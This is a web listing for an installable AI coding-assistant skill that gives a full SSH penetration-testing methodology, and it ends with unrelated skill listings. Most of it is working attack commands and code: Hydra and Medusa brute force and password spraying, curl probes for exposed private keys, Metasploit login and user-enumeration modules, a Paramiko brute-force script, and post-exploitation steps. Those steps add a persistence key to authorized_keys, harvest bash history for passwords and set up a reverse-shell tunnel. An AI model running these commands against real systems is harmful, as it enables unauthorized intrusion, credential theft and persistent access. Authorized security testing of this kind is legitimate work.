ssh-penetration-testing
This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". It provides comprehensive SSH penetration testing methodologies and techniques.
Install
mkdir -p .claude/skills/ssh-penetration-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/782" && unzip -o skill.zip -d .claude/skills/ssh-penetration-testing && rm skill.zipInstalls to .claude/skills/ssh-penetration-testing
About this skill
SSH Penetration Testing
Purpose
Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
Prerequisites
Required Tools
- Nmap with SSH scripts
- Hydra or Medusa for brute-forcing
- ssh-audit for configuration analysis
- Metasploit Framework
- Python with Paramiko library
Required Knowledge
- SSH protocol fundamentals
- Public/private key authentication
- Port forwarding concepts
- Linux command-line proficiency
Outputs and Deliverables
- SSH Enumeration Report - Versions, algorithms, configurations
- Credential Assessment - Weak passwords, default credentials
- Vulnerability Assessment - Known CVEs, misconfigurations
- Tunnel Documentation - Port forwarding configurations
Core Workflow
Phase 1: SSH Service Discovery
Identify SSH services on target networks:
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open
# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100
# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh
# Service version detection
nmap -sV -p 22 192.168.1.100
Phase 2: SSH Enumeration
Gather detailed information about SSH services:
# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5
# Telnet banner grab
telnet 192.168.1.100 22
# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100
# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100
# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100
# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
Phase 3: SSH Configuration Auditing
Identify weak configurations:
# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100
# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100
# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions
Key configuration weaknesses to identify:
- Weak key exchange algorithms (diffie-hellman-group1-sha1)
- Weak ciphers (arcfour, 3des-cbc)
- Weak MACs (hmac-md5, hmac-sha1-96)
- Deprecated protocol versions
Phase 4: Credential Attacks
Brute-Force with Hydra
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100
# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100
# Rate limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100
# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100
# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100
Brute-Force with Medusa
# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh
# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh
# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
Password Spraying
# Test common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100
# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
hydra -L users.txt -p "$pass" ssh://192.168.1.100
done
Phase 5: Key-Based Authentication Testing
Test for weak or exposed keys:
# Attempt login with found private key
ssh -i id_rsa [email protected]
# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa [email protected]
# Force password authentication
ssh -o PreferredAuthentications=password [email protected]
# Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
ssh -i "$key" [email protected]
done
Check for exposed keys:
# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/
# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz
Phase 6: Vulnerability Exploitation
Search for known vulnerabilities:
# Search for exploits
searchsploit openssh
searchsploit openssh 7.2
# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration
# CVE-2016-0777 - Roaming vulnerability
# CVE-2016-0778 - Buffer overflow
# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run
# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
Phase 7: SSH Tunneling and Port Forwarding
Local Port Forwarding
Forward local port to remote service:
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server
# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 [email protected]
# Now access http://localhost:8080
# Access internal database
ssh -L 3306:192.168.1.50:3306 [email protected]
# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 [email protected]
Remote Port Forwarding
Expose local service to remote network:
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server
# Expose local web server to remote
ssh -R 8080:localhost:80 [email protected]
# Remote can access via localhost:8080
# Reverse shell callback
ssh -R 4444:localhost:4444 [email protected]
Dynamic Port Forwarding (SOCKS Proxy)
Create SOCKS proxy for network pivoting:
# Create SOCKS proxy on local port 1080
ssh -D 1080 [email protected]
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24
# Browser configuration
# Set SOCKS proxy to localhost:1080
ProxyJump (Jump Hosts)
Chain through multiple SSH servers:
# Jump through intermediate host
ssh -J user1@jump_host user2@target_host
# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target
# With SSH config
# ~/.ssh/config
Host target
HostName 192.168.2.50
User admin
ProxyJump [email protected]
Phase 8: Post-Exploitation
Activities after gaining SSH access:
# Check sudo privileges
sudo -l
# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
# Check SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys
# Add persistence (add your key)
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
# Extract SSH configuration
cat /etc/ssh/sshd_config
# Find other users
cat /etc/passwd | grep -v nologin
ls /home/
# History for credentials
cat ~/.bash_history | grep -i ssh
cat ~/.bash_history | grep -i pass
Phase 9: Custom SSH Scripts with Paramiko
Python-based SSH automation:
#!/usr/bin/env python3
import paramiko
import sys
def ssh_connect(host, username, password):
"""Attempt SSH connection with credentials"""
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(host, username=username, password=password, timeout=5)
print(f"[+] Success: {username}:{password}")
return client
except paramiko.AuthenticationException:
print(f"[-] Failed: {username}:{password}")
return None
except Exception as e:
print(f"[!] Error: {e}")
return None
def execute_command(client, command):
"""Execute command via SSH"""
stdin, stdout, stderr = client.exec_command(command)
output = stdout.read().decode()
errors = stderr.read().decode()
return output, errors
def ssh_brute_force(host, username, wordlist):
"""Brute-force SSH with wordlist"""
with open(wordlist, 'r') as f:
passwords = f.read().splitlines()
for password in passwords:
client = ssh_connect(host, username, password.strip())
if client:
# Run post-exploitation commands
output, _ = execute_command(client, 'id; uname -a')
print(output)
client.close()
return True
return False
# Usage
if __name__ == "__main__":
target = "192.168.1.100"
user = "admin"
# Single credential test
client = ssh_connect(target, user, "password123")
if client:
output, _ = execute_command(client, "ls -la")
print(output)
client.close()
Phase 10: Metasploit SSH Modules
Use Metasploit for comprehensive SSH testing:
# Start Metasploit
msfconsole
# SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run
# SSH Login Brute-Force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run
# SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
set KEY_FILE /path/to/id_rsa
run
# Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run
# Post-exploitation with SSH session
sessions -i 1
Quick Reference
SSH Enumeration Commands
| Command | Purpose |
|---|---|
nc <host> 22 | Banner grabbing |
ssh-audit <host> | Configuration audit |
nmap --script ssh* | SSH NSE scripts |
searchsploit openssh | Find exploits |
Brute-Force Options
| Tool | Command |
|---|---|
| Hydra | `hydra -l |
Content truncated.
More by davila7
View all skills by davila7 →You might also like
flutter-development
aj-geddes
Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.
ui-ux-pro-max
nextlevelbuilder
"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."
drawio-diagrams-enhanced
jgtolentino
Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.
godot
bfollington
This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.
nano-banana-pro
garg-aayush
Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.
pdf-to-markdown
aliceisjustplaying
Convert entire PDF documents to clean, structured Markdown for full context loading. Use this skill when the user wants to extract ALL text from a PDF into context (not grep/search), when discussing or analyzing PDF content in full, when the user mentions "load the whole PDF", "bring the PDF into context", "read the entire PDF", or when partial extraction/grepping would miss important context. This is the preferred method for PDF text extraction over page-by-page or grep approaches.
Related MCP Servers
Browse all servers
Figma ContextUnlock seamless Figma to code: streamline Figma to HTML with Framelink MCP Server for fast, accurate design-to-code work
Laravel BoostOfficial Laravel-focused MCP server for augmenting AI-powered local development. Provides deep context about your Larave
GrafanaSafely connect cloud Grafana to AI agents with MCP: query, inspect, and manage Grafana resources using simple, focused o
PerplexityEmpower your workflows with Perplexity Ask MCP Server—seamless integration of AI research tools for real-time, accurate
Azure DevOpsBoost your productivity by managing Azure DevOps projects, pipelines, and repos in VS Code. Streamline dev workflows wit
Ref ToolsBoost AI coding agents with Ref Tools—efficient documentation access for faster, smarter code generation than GitHub Cop
Stay ahead of the MCP ecosystem
Get weekly updates on new skills and servers.